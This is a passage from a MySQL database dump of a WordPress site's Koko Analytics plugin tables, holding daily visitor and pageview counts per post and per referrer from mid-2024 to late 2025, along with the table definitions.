('2025-04-09',1,19,3,4),
('2025-04-09',19,441,1,1),
('2025-04-09',28,453,1,1),
('2025-04-10',1,19,6,6),
('2025-04-10',23,457,1,1),
('2025-04-11',1,19,6,7),
('2025-04-11',18,367,1,1),
('2025-04-12',1,19,3,5),
('2025-04-12',16,116,1,1),
('2025-04-13',18,367,4,4),
('2025-04-15',1,19,1,1),
('2025-04-16',1,19,8,12),
('2025-04-16',23,457,1,2),
('2025-04-17',1,19,5,8),
('2025-04-18',1,19,4,4),
('2025-04-18',19,441,1,2),
('2025-04-19',1,19,3,3),
('2025-04-20',1,19,1,1),
('2025-04-21',1,19,4,7),
('2025-04-21',16,116,1,2),
('2025-04-21',19,441,1,3),
('2025-04-21',23,457,1,1),
('2025-04-22',1,19,5,7),
('2025-04-22',5,147,1,1),
('2025-04-22',17,349,1,1),
('2025-04-23',1,19,2,2),
('2025-04-23',19,441,1,1),
('2025-04-24',1,19,7,12),
('2025-04-24',5,147,1,1),
('2025-04-24',19,441,1,1),
('2025-04-26',1,19,5,7),
('2025-04-26',17,349,1,1),
('2025-04-28',1,19,5,7),
('2025-04-28',18,367,1,1),
('2025-04-28',23,457,1,1),
('2025-04-28',24,463,1,1),
('2025-04-29',1,19,5,9),
('2025-04-29',20,444,1,2),
('2025-04-30',1,19,2,6),
('2025-05-01',1,19,2,2),
('2025-05-02',1,19,3,3),
('2025-05-02',6,136,1,1),
('2025-05-03',1,19,3,4),
('2025-05-04',1,19,6,6),
('2025-05-05',1,19,6,8),
('2025-05-05',16,116,1,1),
('2025-05-05',20,444,1,1),
('2025-05-06',1,19,7,8),
('2025-05-06',5,147,1,1),
('2025-05-07',1,19,7,7),
('2025-05-08',1,19,6,7),
('2025-05-09',1,19,8,11),
('2025-05-10',1,19,7,7),
('2025-05-10',23,457,1,1),
('2025-05-11',1,19,1,1),
('2025-05-12',1,19,2,2),
('2025-05-12',19,441,1,1),
('2025-05-13',1,19,3,4),
('2025-08-26',1,19,3,3),
('2025-08-26',16,116,1,2),
('2025-08-26',29,660,1,1),
('2025-08-27',1,19,4,6),
('2025-08-28',1,19,1,2),
('2025-08-29',1,19,1,1),
('2025-08-29',16,116,1,1),
('2025-08-30',1,19,1,1),
('2025-08-30',30,649,1,1),
('2025-08-31',1,19,6,9),
('2025-09-01',1,19,9,32),
('2025-09-02',1,19,9,18),
('2025-09-03',1,19,9,11),
('2025-09-03',16,116,1,2),
('2025-09-06',1,19,3,8),
('2025-09-07',1,19,11,18),
('2025-09-08',1,19,17,31),
('2025-09-09',1,19,14,28),
('2025-09-10',1,19,12,14),
('2025-09-10',18,367,1,1),
('2025-09-11',1,19,15,33),
('2025-09-11',31,541,1,2),
('2025-09-12',1,19,5,8),
('2025-09-13',1,19,2,2),
('2025-09-14',1,19,11,15),
('2025-09-14',31,541,1,1),
('2025-09-15',1,19,6,7),
('2025-09-16',1,19,4,5),
('2025-09-17',1,19,3,5),
('2025-09-18',1,19,7,10),
('2025-09-18',4,140,1,1),
('2025-09-19',1,19,5,8),
('2025-09-20',1,19,2,3),
('2025-09-21',1,19,3,3),
('2025-09-22',1,19,7,10),
('2025-09-22',16,116,1,1),
('2025-09-23',1,19,5,8),
('2025-09-23',16,116,1,1),
('2025-09-24',1,19,3,5),
('2025-09-25',1,19,10,15),
('2025-09-25',32,592,1,1),
('2025-09-26',1,19,1,2),
('2025-09-28',1,19,1,1),
('2025-09-29',1,19,5,5),
('2025-09-30',1,19,4,4),
('2025-10-01',1,19,2,2),
('2025-10-02',1,19,2,2),
('2025-10-03',1,19,2,4),
('2025-10-04',1,19,4,5),
('2025-10-05',1,19,2,3),
('2025-10-05',9,158,1,1),
('2025-10-06',1,19,6,9),
('2025-10-07',1,19,5,5),
('2025-10-08',1,19,6,8),
('2025-10-09',1,19,4,6),
('2025-10-10',1,19,3,5),
('2025-10-11',1,19,4,6),
('2025-10-13',19,441,1,1),
('2025-10-14',1,19,1,2),
('2025-10-15',1,19,2,10),
('2025-10-16',1,19,6,10),
('2025-10-18',1,19,1,1),
('2025-10-18',16,116,1,1),
('2025-10-19',1,19,4,14),
('2025-10-20',1,19,6,6),
('2025-10-21',1,19,7,9),
('2025-10-22',1,19,5,5),
('2025-10-24',1,19,3,3),
('2025-10-25',1,19,8,11),
('2025-10-26',1,19,7,26),
('2025-10-26',16,116,1,2),
('2025-10-27',1,19,4,4),
('2025-10-28',1,19,5,7),
('2025-10-30',1,19,3,5),
('2025-10-31',1,19,4,5),
('2025-10-31',16,116,1,1),
('2025-11-01',1,19,5,6),
('2025-11-02',1,19,2,2),
('2025-11-03',1,19,3,3),
('2025-11-04',1,19,9,12),
('2025-11-05',1,19,9,11),
('2025-11-05',33,552,1,1),
('2025-11-06',1,19,4,4),
('2025-11-06',18,367,1,1),
('2025-11-07',1,19,13,16),
('2025-11-08',1,19,2,3),
('2025-11-10',1,19,4,13),
('2025-11-11',1,19,8,10),
('2025-11-12',1,19,6,10),
('2025-11-13',1,19,8,27),
('2025-11-13',19,441,1,1),
('2025-11-14',1,19,8,21),
('2025-11-15',1,19,2,4),
('2025-11-15',9,158,1,1),
('2025-11-16',1,19,1,1),
('2025-11-17',1,19,1,4),
('2025-11-17',34,0,1,1);
/*!40000 ALTER TABLE `wp_koko_analytics_post_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_post_stats_old`
--

DROP TABLE IF EXISTS `wp_koko_analytics_post_stats_old`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_post_stats_old` (
  `date` date NOT NULL,
  `post_id` int(10) unsigned NOT NULL,
  `visitors` mediumint(8) unsigned NOT NULL,
  `pageviews` mediumint(8) unsigned NOT NULL,
  `path_id` mediumint(8) unsigned DEFAULT NULL,
  PRIMARY KEY (`date`,`post_id`)
) ENGINE=InnoDB DEFAULT CHARSET=ascii COLLATE=ascii_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_post_stats_old`
--

LOCK TABLES `wp_koko_analytics_post_stats_old` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_post_stats_old` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_post_stats_old` VALUES
('2024-07-29',19,2,4,1),
('2024-07-30',19,6,10,1),
('2024-07-30',104,1,1,2),
('2024-07-30',123,1,1,3),
('2024-07-30',140,1,1,4),
('2024-07-30',147,1,1,5),
('2024-07-31',19,4,5,1),
('2024-08-01',19,8,10,1),
('2024-08-01',123,1,1,3),
('2024-08-02',19,6,9,1),
('2024-08-03',19,5,17,1),
('2024-08-03',136,1,1,6),
('2024-08-03',140,2,2,4),
('2024-08-03',147,1,1,5),
('2024-08-04',19,3,3,1),
('2024-08-04',123,1,1,3),
('2024-08-05',19,4,8,1),
('2024-08-05',104,1,1,2),
('2024-08-05',127,1,1,7),
('2024-08-05',136,1,1,6),
('2024-08-05',140,1,1,4),
('2024-08-06',19,22,63,1),
('2024-08-06',104,1,1,2),
('2024-08-06',107,1,1,8),
('2024-08-06',123,3,4,3),
('2024-08-06',136,1,1,6),
('2024-08-06',158,2,7,9),
('2024-08-07',19,7,14,1),
('2024-08-07',119,1,1,10),
('2024-08-07',123,1,1,3),
('2024-08-09',19,4,7,1),
('2024-08-09',104,1,1,2),
('2024-08-10',19,1,1,1),
('2024-08-11',19,8,9,1),
('2024-08-12',19,4,7,1),
('2024-08-13',19,4,6,1),
('2024-08-14',19,9,14,1),
('2024-08-14',112,1,1,11),
('2024-08-14',123,1,1,3),
('2024-08-14',158,1,2,9),
('2024-08-15',19,7,32,1),
('2024-08-15',123,1,1,3),
('2024-08-15',158,1,1,9),
('2024-08-15',177,2,5,12),
('2024-08-15',189,1,3,13),
('2024-08-16',19,5,13,1),
('2024-08-16',177,1,1,12),
('2024-08-17',19,1,1,1),
('2024-08-19',19,3,3,1),
('2024-08-20',19,4,8,1),
('2024-08-21',19,0,1,1),
('2024-08-21',189,1,2,13),
('2024-08-22',19,2,3,1),
('2024-08-22',177,1,1,12),
('2024-08-23',19,3,28,1),
('2024-08-24',19,2,2,1),
('2024-08-25',19,4,7,1),
('2024-08-26',19,6,29,1),
('2024-08-26',104,1,1,2),
('2024-08-26',177,1,1,12),
('2024-08-26',189,1,1,13),
('2024-08-27',19,16,67,1),
('2024-08-27',104,1,1,2),
('2024-08-27',158,1,1,9),
('2024-08-27',189,1,4,13),
('2024-08-28',19,21,156,1),
('2024-08-29',19,24,120,1),
('2024-08-29',140,1,1,4),
('2024-08-30',19,12,110,1),
('2024-08-30',123,1,1,3),
('2024-08-30',147,1,1,5),
('2024-08-30',158,1,1,9),
('2024-08-30',189,2,6,13),
('2024-08-30',306,3,10,14),
('2024-08-30',327,1,2,15),
('2024-08-31',19,5,5,1),
('2024-09-01',19,3,5,1),
('2024-09-01',127,1,1,7),
('2024-09-02',19,6,9,1),
('2024-09-02',116,1,1,16),
('2024-09-02',136,1,1,6),
('2024-09-03',19,11,34,1),
('2024-09-03',189,1,3,13),
('2024-09-03',349,3,4,17),
('2024-09-04',19,6,11,1),
('2024-09-05',19,7,10,1),
('2024-09-06',19,8,13,1),
('2024-09-06',140,1,1,4),
('2024-09-06',189,1,2,13),
('2024-09-07',19,3,3,1),
('2024-09-08',19,1,1,1),
('2024-09-09',19,9,15,1),
('2024-09-10',19,4,4,1),
('2024-09-11',19,6,8,1),
('2024-09-12',19,6,31,1),
('2024-09-12',367,1,1,18),
('2024-09-14',19,2,3,1),
('2024-09-15',19,2,2,1),
('2024-09-16',19,3,7,1),
('2024-09-17',19,4,6,1),
('2024-09-17',177,1,1,12),
('2024-09-18',19,3,3,1),
('2024-09-18',140,1,1,4),
('2024-09-19',19,6,8,1),
('2024-09-19',140,2,2,4),
('2024-09-20',19,4,4,1),
('2024-09-20',140,1,1,4),
('2024-09-20',177,1,1,12),
('2024-09-20',189,1,1,13),
('2024-09-20',349,1,1,17),
('2024-09-20',367,1,1,18),
('2024-09-23',19,4,6,1),
('2024-09-24',19,8,70,1),
('2024-09-24',367,1,1,18),
('2024-09-25',19,10,31,1),
('2024-09-25',441,1,2,19),
('2024-09-25',444,2,2,20),
('2024-09-25',449,2,2,21),
('2024-09-26',19,8,12,1),
('2024-09-27',19,3,4,1),
('2024-09-28',19,3,4,1),
('2024-09-29',19,1,2,1),
('2024-09-30',19,5,8,1),
('2024-10-01',19,1,11,1),
('2024-10-01',116,1,1,16),
('2024-10-02',19,4,6,1),
('2024-10-04',19,2,2,1),
('2024-10-05',19,2,2,1),
('2024-10-10',19,1,1,1),
('2025-01-14',19,10,21,1),
('2025-01-14',367,1,1,18),
('2025-01-15',19,3,5,1),
('2025-01-16',19,4,4,1),
('2025-01-17',19,3,7,1),
('2025-01-17',116,1,1,16),
('2025-01-18',19,3,3,1),
('2025-01-19',19,2,3,1),
('2025-01-20',19,15,19,1),
('2025-01-21',19,11,27,1),
('2025-01-22',19,9,10,1),
('2025-01-23',19,8,22,1),
('2025-01-24',19,6,7,1),
('2025-01-25',19,6,11,1),
('2025-01-25',140,1,1,4),
('2025-01-26',19,7,12,1),
('2025-01-27',19,9,13,1),
('2025-01-27',116,1,1,16),
('2025-01-28',19,2,2,1),
('2025-01-28',367,1,1,18),
('2025-01-29',19,14,25,1),
('2025-01-29',367,1,1,18),
('2025-01-30',19,5,6,1),
('2025-01-31',19,5,8,1),
('2025-02-01',19,3,4,1),
('2025-02-02',19,4,5,1),
('2025-02-03',19,5,5,1),
('2025-02-04',19,4,4,1),
('2025-02-04',116,2,2,16),
('2025-02-04',367,1,1,18),
('2025-02-05',19,7,17,1),
('2025-02-06',19,5,8,1),
('2025-02-06',116,1,1,16),
('2025-02-07',19,4,10,1),
('2025-02-07',441,1,1,19),
('2025-02-08',19,5,7,1),
('2025-02-09',19,3,4,1),
('2025-02-09',441,1,1,19),
('2025-02-10',19,6,8,1),
('2025-02-10',367,1,1,18),
('2025-02-11',19,4,10,1),
('2025-02-12',19,2,2,1),
('2025-02-13',19,5,5,1),
('2025-02-14',19,8,10,1),
('2025-02-15',19,5,6,1),
('2025-02-16',19,2,4,1),
('2025-02-16',140,1,1,4),
('2025-02-17',19,8,9,1),
('2025-02-17',116,1,1,16),
('2025-02-18',19,4,7,1),
('2025-02-19',19,7,11,1),
('2025-02-19',158,1,2,9),
('2025-02-20',19,8,10,1),
('2025-02-21',19,5,6,1),
('2025-02-21',116,1,1,16),
('2025-02-22',19,9,19,1),
('2025-02-23',19,9,19,1),
('2025-02-23',116,1,1,16),
('2025-02-23',367,1,2,18),
('2025-02-24',19,5,8,1),
('2025-02-24',140,1,1,4),
('2025-02-25',19,5,10,1),
('2025-02-25',96,1,1,22),
('2025-02-27',19,3,3,1),
('2025-02-28',19,1,1,1),
('2025-03-01',19,6,6,1),
('2025-03-02',19,5,11,1),
('2025-03-03',19,5,5,1),
('2025-03-04',19,4,5,1),
('2025-03-05',19,4,5,1),
('2025-03-06',19,8,11,1),
('2025-03-07',19,4,4,1),
('2025-03-08',19,4,4,1),
('2025-03-09',116,1,1,16),
('2025-03-10',19,5,9,1),
('2025-03-11',19,10,13,1),
('2025-03-11',140,2,3,4),
('2025-03-12',19,3,7,1),
('2025-03-13',19,7,7,1),
('2025-03-14',19,5,5,1),
('2025-03-15',19,7,7,1),
('2025-03-16',19,2,2,1),
('2025-03-17',19,8,14,1),
('2025-03-18',19,4,10,1),
('2025-03-19',19,8,14,1),
('2025-03-19',107,1,1,8),
('2025-03-20',19,12,16,1),
('2025-03-20',367,1,1,18),
('2025-03-20',457,1,1,23),
('2025-03-20',463,1,1,24),
('2025-03-21',19,9,10,1),
('2025-03-22',19,3,5,1),
('2025-03-23',19,4,14,1),
('2025-03-23',140,1,1,4),
('2025-03-23',367,1,1,18),
('2025-03-23',441,1,1,19),
('2025-03-23',463,2,2,24),
('2025-03-24',19,4,7,1),
('2025-03-24',140,1,1,4),
('2025-03-25',19,10,11,1),
('2025-03-26',19,11,20,1),
('2025-03-27',19,8,15,1),
('2025-03-27',441,2,2,19),
('2025-03-28',19,4,9,1),
('2025-03-28',441,2,2,19),
('2025-03-29',19,6,13,1),
('2025-03-29',100,1,2,25),
('2025-03-29',116,1,1,16),
('2025-03-29',119,1,1,10),
('2025-03-29',127,1,1,7),
('2025-03-29',189,1,2,13),
('2025-03-29',306,1,1,14),
('2025-03-29',358,1,1,26),
('2025-03-29',388,1,1,27),
('2025-03-29',444,1,1,20),
('2025-03-29',449,1,1,21),
('2025-03-29',453,1,3,28),
('2025-03-29',457,1,1,23),
('2025-03-29',463,1,2,24),
('2025-03-30',19,8,8,1),
('2025-03-30',457,1,1,23),
('2025-03-31',19,35,53,1),
('2025-03-31',367,2,2,18),
('2025-03-31',441,2,2,19),
('2025-03-31',457,1,1,23),
('2025-04-01',19,7,10,1),
('2025-04-02',19,4,7,1),
('2025-04-03',19,4,7,1),
('2025-04-03',147,1,1,5),
('2025-04-04',19,4,7,1),
('2025-04-04',367,1,1,18),
('2025-04-05',19,4,4,1),
('2025-04-05',147,1,1,5),
('2025-04-05',441,1,2,19),
('2025-04-05',449,1,1,21),
('2025-04-06',19,3,5,1),
('2025-04-07',19,16,20,1),
('2025-04-08',19,3,6,1),
('2025-04-08',367,1,1,18),
('2025-04-08',441,1,1,19),
('2025-04-09',19,3,4,1),
('2025-04-09',441,1,1,19),
('2025-04-09',453,1,1,28),
('2025-04-10',19,6,6,1),
('2025-04-10',457,1,1,23),
('2025-04-11',19,6,7,1),
('2025-04-11',367,1,1,18),
('2025-04-12',19,3,5,1),
('2025-04-12',116,1,1,16),
('2025-04-13',367,4,4,18),
('2025-04-15',19,1,1,1),
('2025-04-16',19,8,12,1),
('2025-04-16',457,1,2,23),
('2025-04-17',19,5,8,1),
('2025-04-18',19,4,4,1),
('2025-04-18',441,1,2,19),
('2025-04-19',19,3,3,1),
('2025-04-20',19,1,1,1),
('2025-04-21',19,4,7,1),
('2025-04-21',116,1,2,16),
('2025-04-21',441,1,3,19),
('2025-04-21',457,1,1,23),
('2025-04-22',19,5,7,1),
('2025-04-22',147,1,1,5),
('2025-04-22',349,1,1,17),
('2025-04-23',19,2,2,1),
('2025-04-23',441,1,1,19),
('2025-04-24',19,7,12,1),
('2025-04-24',147,1,1,5),
('2025-04-24',441,1,1,19),
('2025-04-26',19,5,7,1),
('2025-04-26',349,1,1,17),
('2025-04-28',19,5,7,1),
('2025-04-28',367,1,1,18),
('2025-04-28',457,1,1,23),
('2025-04-28',463,1,1,24),
('2025-04-29',19,5,9,1),
('2025-04-29',444,1,2,20),
('2025-04-30',19,2,6,1),
('2025-05-01',19,2,2,1),
('2025-05-02',19,3,3,1),
('2025-05-02',136,1,1,6),
('2025-05-03',19,3,4,1),
('2025-05-04',19,6,6,1),
('2025-05-05',19,6,8,1),
('2025-05-05',116,1,1,16),
('2025-05-05',444,1,1,20),
('2025-05-06',19,7,8,1),
('2025-05-06',147,1,1,5),
('2025-05-07',19,7,7,1),
('2025-05-08',19,6,7,1),
('2025-05-09',19,8,11,1),
('2025-05-10',19,7,7,1),
('2025-05-10',457,1,1,23),
('2025-05-11',19,1,1,1),
('2025-05-12',19,2,2,1),
('2025-05-12',441,1,1,19),
('2025-05-13',19,3,4,1),
('2025-08-26',19,3,3,1),
('2025-08-26',116,1,2,16),
('2025-08-26',660,1,1,29),
('2025-08-27',19,4,6,1),
('2025-08-28',19,1,2,1),
('2025-08-29',19,1,1,1),
('2025-08-29',116,1,1,16),
('2025-08-30',19,1,1,1),
('2025-08-30',649,1,1,30),
('2025-08-31',19,6,9,1),
('2025-09-01',19,9,32,1),
('2025-09-02',19,9,18,1),
('2025-09-03',19,9,11,1),
('2025-09-03',116,1,2,16),
('2025-09-06',19,3,8,1),
('2025-09-07',19,11,18,1),
('2025-09-08',19,17,31,1),
('2025-09-09',19,14,28,1),
('2025-09-10',19,12,14,1),
('2025-09-10',367,1,1,18),
('2025-09-11',19,15,33,1),
('2025-09-11',541,1,2,31),
('2025-09-12',19,5,8,1),
('2025-09-13',19,2,2,1),
('2025-09-14',19,11,15,1),
('2025-09-14',541,1,1,31),
('2025-09-15',19,6,7,1),
('2025-09-16',19,4,5,1),
('2025-09-17',19,3,5,1),
('2025-09-18',19,7,10,1),
('2025-09-18',140,1,1,4),
('2025-09-19',19,5,8,1),
('2025-09-20',19,2,3,1),
('2025-09-21',19,3,3,1),
('2025-09-22',19,7,10,1),
('2025-09-22',116,1,1,16),
('2025-09-23',19,5,8,1),
('2025-09-23',116,1,1,16),
('2025-09-24',19,3,5,1),
('2025-09-25',19,10,15,1),
('2025-09-25',592,1,1,32),
('2025-09-26',19,1,2,1),
('2025-09-28',19,1,1,1),
('2025-09-29',19,5,5,1),
('2025-09-30',19,4,4,1),
('2025-10-01',19,2,2,1),
('2025-10-02',19,2,2,1),
('2025-10-03',19,2,4,1),
('2025-10-04',19,4,5,1),
('2025-10-05',19,2,3,1),
('2025-10-05',158,1,1,9),
('2025-10-06',19,6,9,1),
('2025-10-07',19,5,5,1),
('2025-10-08',19,6,8,1),
('2025-10-09',19,4,6,1),
('2025-10-10',19,3,5,1),
('2025-10-11',19,4,6,1),
('2025-10-13',441,1,1,19),
('2025-10-14',19,1,2,1),
('2025-10-15',19,2,10,1),
('2025-10-16',19,6,10,1),
('2025-10-18',19,1,1,1),
('2025-10-18',116,1,1,16),
('2025-10-19',19,4,14,1),
('2025-10-20',19,6,6,1),
('2025-10-21',19,7,9,1),
('2025-10-22',19,5,5,1),
('2025-10-24',19,3,3,1),
('2025-10-25',19,8,11,1),
('2025-10-26',19,7,26,1),
('2025-10-26',116,1,2,16),
('2025-10-27',19,4,4,1),
('2025-10-28',19,5,7,1),
('2025-10-30',19,3,5,1),
('2025-10-31',19,4,5,1),
('2025-10-31',116,1,1,16),
('2025-11-01',19,5,6,1),
('2025-11-02',19,2,2,1),
('2025-11-03',19,3,3,1),
('2025-11-04',19,9,12,1),
('2025-11-05',19,9,11,1),
('2025-11-05',552,1,1,33),
('2025-11-06',19,4,4,1),
('2025-11-06',367,1,1,18),
('2025-11-07',19,13,16,1),
('2025-11-08',19,2,3,1),
('2025-11-10',19,4,13,1),
('2025-11-11',19,8,10,1),
('2025-11-12',19,6,10,1),
('2025-11-13',19,1,1,1);
/*!40000 ALTER TABLE `wp_koko_analytics_post_stats_old` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_referrer_stats`
--

DROP TABLE IF EXISTS `wp_koko_analytics_referrer_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_referrer_stats` (
  `date` date NOT NULL,
  `id` mediumint(8) unsigned NOT NULL,
  `visitors` mediumint(8) unsigned NOT NULL,
  `pageviews` mediumint(8) unsigned NOT NULL,
  PRIMARY KEY (`date`,`id`)
) ENGINE=InnoDB DEFAULT CHARSET=ascii COLLATE=ascii_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_referrer_stats`
--

LOCK TABLES `wp_koko_analytics_referrer_stats` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_referrer_stats` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_referrer_stats` VALUES
('2024-07-29',1,1,2),
('2024-07-30',1,1,1),
('2024-07-30',2,1,1),
('2024-07-30',3,1,2),
('2024-07-31',3,1,1),
('2024-08-01',1,3,3),
('2024-08-01',3,3,3),
('2024-08-02',1,1,1),
('2024-08-02',3,5,8),
('2024-08-03',1,1,1),
('2024-08-03',3,3,6),
('2024-08-03',4,0,1),
('2024-08-04',1,1,1),
('2024-08-04',3,1,1),
('2024-08-05',1,1,3),
('2024-08-05',3,1,1),
('2024-08-05',5,2,3),
('2024-08-06',1,12,30),
('2024-08-06',3,4,5),
('2024-08-06',4,1,3),
('2024-08-06',5,2,4),
('2024-08-07',1,2,3),
('2024-08-07',3,2,2),
('2024-08-07',4,1,2),
('2024-08-09',1,1,2),
('2024-08-10',3,1,1),
('2024-08-11',3,5,6),
('2024-08-12',3,1,1),
('2024-08-13',1,2,4),
('2024-08-13',3,1,1),
('2024-08-14',1,1,1),
('2024-08-14',3,2,4),
('2024-08-14',4,3,3),
('2024-08-14',5,1,1),
('2024-08-15',1,2,17),
('2024-08-15',3,1,1),
('2024-08-15',5,1,1),
('2024-08-16',3,2,8),
('2024-08-16',4,1,2),
('2024-08-16',6,1,1),
('2024-08-17',4,1,1),
('2024-08-19',1,1,1),
('2024-08-19',3,1,1),
('2024-08-20',1,1,2),
('2024-08-20',3,1,3),
('2024-08-20',4,1,1),
('2024-08-22',1,1,1),
('2024-08-22',3,2,3),
('2024-08-23',3,1,1),
('2024-08-23',4,1,1),
('2024-08-24',1,1,1),
('2024-08-25',3,2,3),
('2024-08-26',1,3,5),
('2024-08-26',3,2,6),
('2024-08-27',3,5,8),
('2024-08-27',5,1,1),
('2024-08-28',1,4,51),
('2024-08-28',3,2,3),
('2024-08-28',7,1,3),
('2024-08-29',1,4,46),
('2024-08-29',3,1,1),
('2024-08-30',1,2,31),
('2024-08-30',3,1,1),
('2024-08-30',7,1,2),
('2024-08-31',3,3,3),
('2024-09-01',1,1,4),
('2024-09-02',1,2,2),
('2024-09-02',3,3,4),
('2024-09-02',5,1,2),
('2024-09-03',1,3,13),
('2024-09-03',3,2,2),
('2024-09-04',3,1,1),
('2024-09-04',4,1,1),
('2024-09-05',3,2,2),
('2024-09-06',1,2,3),
('2024-09-06',3,1,2),
('2024-09-07',3,1,1),
('2024-09-07',4,2,2),
('2024-09-08',3,1,1),
('2024-09-09',1,0,2),
('2024-09-09',3,3,4),
('2024-09-10',3,2,2),
('2024-09-10',4,1,1),
('2024-09-11',3,3,3),
('2024-09-12',1,0,1),
('2024-09-12',3,2,5),
('2024-09-14',3,2,3),
('2024-09-15',3,1,1),
('2024-09-15',4,1,1),
('2024-09-17',3,3,5),
('2024-09-18',3,0,1),
('2024-09-18',4,1,1),
('2024-09-19',3,2,3),
('2024-09-19',4,1,1),
('2024-09-19',7,1,2),
('2024-09-20',3,3,3),
('2024-09-23',3,2,2),
('2024-09-23',4,1,3),
('2024-09-24',1,2,44),
('2024-09-24',3,3,5),
('2024-09-24',4,1,1),
('2024-09-25',1,3,6),
('2024-09-25',3,4,5),
('2024-09-26',1,1,1),
('2024-09-26',3,4,6),
('2024-09-27',1,1,1),
('2024-09-27',3,2,3),
('2024-09-28',7,1,1),
('2024-09-29',3,1,2),
('2024-09-30',3,2,4),
('2024-09-30',4,1,1),
('2024-09-30',8,1,1),
('2024-10-02',1,1,3),
('2024-10-02',4,1,1),
('2024-10-04',1,1,1),
('2024-10-04',5,1,1),
('2024-10-05',1,2,2),
('2024-10-10',5,1,1),
('2025-01-14',3,7,14),
('2025-01-14',4,1,1),
('2025-01-15',3,2,2),
('2025-01-15',7,1,1),
('2025-01-16',3,2,2),
('2025-01-16',4,1,1),
('2025-01-17',3,2,7),
('2025-01-18',3,3,4),
('2025-01-19',3,1,2),
('2025-01-19',4,1,1),
('2025-01-20',3,12,15),
('2025-01-20',9,1,1),
('2025-01-21',3,8,20),
('2025-01-21',4,1,2),
('2025-01-21',7,1,1),
('2025-01-21',9,1,1),
('2025-01-22',3,6,7),
('2025-01-23',3,6,14),
('2025-01-24',3,3,3),
('2025-01-24',4,1,1),
('2025-01-25',3,5,8),
('2025-01-26',3,3,7),
('2025-01-26',4,1,1),
('2025-01-27',3,5,8),
('2025-01-27',9,1,1),
('2025-01-28',3,3,3),
('2025-01-29',3,13,26),
('2025-01-30',3,4,5),
('2025-01-30',4,1,1),
('2025-01-31',3,4,5),
('2025-02-01',3,2,3),
('2025-02-02',3,1,1),
('2025-02-02',4,2,3),
('2025-02-03',3,3,3),
('2025-02-03',4,1,1),
('2025-02-04',3,6,6),
('2025-02-05',3,5,7),
('2025-02-06',3,3,6),
('2025-02-07',3,2,5),
('2025-02-08',3,2,3),
('2025-02-08',4,2,2),
('2025-02-09',3,2,3),
('2025-02-10',3,4,4),
('2025-02-10',4,1,1),
('2025-02-10',7,1,1),
('2025-02-11',3,3,9),
('2025-02-12',3,2,2),
('2025-02-13',3,4,4),
('2025-02-14',3,3,4),
('2025-02-14',4,2,2),
('2025-02-15',3,1,2),
('2025-02-15',4,2,2),
('2025-02-16',3,1,2),
('2025-02-16',4,1,1),
('2025-02-17',3,6,7),
('2025-02-18',2,1,3),
('2025-02-18',3,2,3),
('2025-02-18',4,1,1),
('2025-02-19',3,5,5),
('2025-02-19',4,1,2),
('2025-02-20',3,7,10),
('2025-02-20',4,1,2),
('2025-02-21',3,4,5),
('2025-02-21',7,1,1),
('2025-02-22',3,5,7),
('2025-02-22',4,1,1),
('2025-02-22',6,1,6),
('2025-02-23',2,1,2),
('2025-02-23',3,4,9),
('2025-02-24',3,3,3),
('2025-02-24',4,1,3),
('2025-02-24',6,1,2),
('2025-02-25',3,3,10),
('2025-02-27',2,1,1),
('2025-02-27',3,2,2),
('2025-02-28',3,1,1),
('2025-03-01',3,3,3),
('2025-03-01',4,2,2),
('2025-03-02',3,1,3),
('2025-03-02',4,1,3),
('2025-03-03',3,4,4),
('2025-03-03',4,1,1),
('2025-03-03',7,1,2),
('2025-03-04',3,4,4),
('2025-03-05',3,4,5),
('2025-03-05',4,1,1),
('2025-03-06',3,4,6),
('2025-03-07',3,2,2),
('2025-03-07',4,1,1),
('2025-03-08',3,2,2),
('2025-03-09',3,2,3),
('2025-03-10',2,1,3),
('2025-03-10',3,2,3),
('2025-03-11',3,9,13),
('2025-03-11',4,1,1),
('2025-03-12',3,2,4),
('2025-03-13',3,3,3),
('2025-03-13',7,1,1),
('2025-03-14',3,1,1),
('2025-03-15',1,2,2),
('2025-03-15',3,2,5),
('2025-03-15',4,1,1),
('2025-03-16',3,1,1),
('2025-03-17',1,1,1),
('2025-03-17',3,4,7),
('2025-03-17',5,1,2),
('2025-03-18',1,1,1),
('2025-03-18',3,3,3),
('2025-03-19',3,5,8),
('2025-03-19',7,1,1),
('2025-03-20',3,6,8),
('2025-03-20',4,1,1),
('2025-03-20',5,1,1),
('2025-03-20',7,1,1),
('2025-03-21',3,8,10),
('2025-03-22',3,1,1),
('2025-03-23',3,3,3),
('2025-03-23',4,1,1),
('2025-03-24',3,3,5),
('2025-03-24',4,2,2),
('2025-03-25',1,1,1),
('2025-03-25',3,6,6),
('2025-03-26',1,2,2),
('2025-03-26',3,4,6),
('2025-03-26',4,1,1),
('2025-03-27',3,4,10),
('2025-03-28',3,4,12),
('2025-03-28',4,1,2),
('2025-03-29',3,3,7),
('2025-03-29',4,1,1),
('2025-03-30',3,2,2),
('2025-03-30',4,1,1),
('2025-03-30',9,1,1),
('2025-03-31',3,18,26),
('2025-03-31',4,1,1),
('2025-03-31',7,1,2),
('2025-04-01',9,1,1),
('2025-04-02',3,0,1),
('2025-04-03',3,2,4),
('2025-04-04',3,4,7),
('2025-04-05',3,3,3),
('2025-04-06',3,2,3),
('2025-04-07',3,11,15),
('2025-04-07',4,1,1),
('2025-04-08',3,2,2),
('2025-04-09',3,2,3),
('2025-04-09',4,1,2),
('2025-04-10',3,2,2),
('2025-04-11',3,2,2),
('2025-04-12',3,1,2),
('2025-04-15',3,1,1),
('2025-04-16',3,2,2),
('2025-04-17',3,1,5),
('2025-04-17',10,1,1),
('2025-04-20',3,1,3),
('2025-04-21',3,1,2),
('2025-04-22',3,2,3),
('2025-04-22',4,0,1),
('2025-04-23',4,1,1),
('2025-04-24',3,8,11),
('2025-04-26',3,3,4),
('2025-04-26',4,1,1),
('2025-04-28',3,4,5),
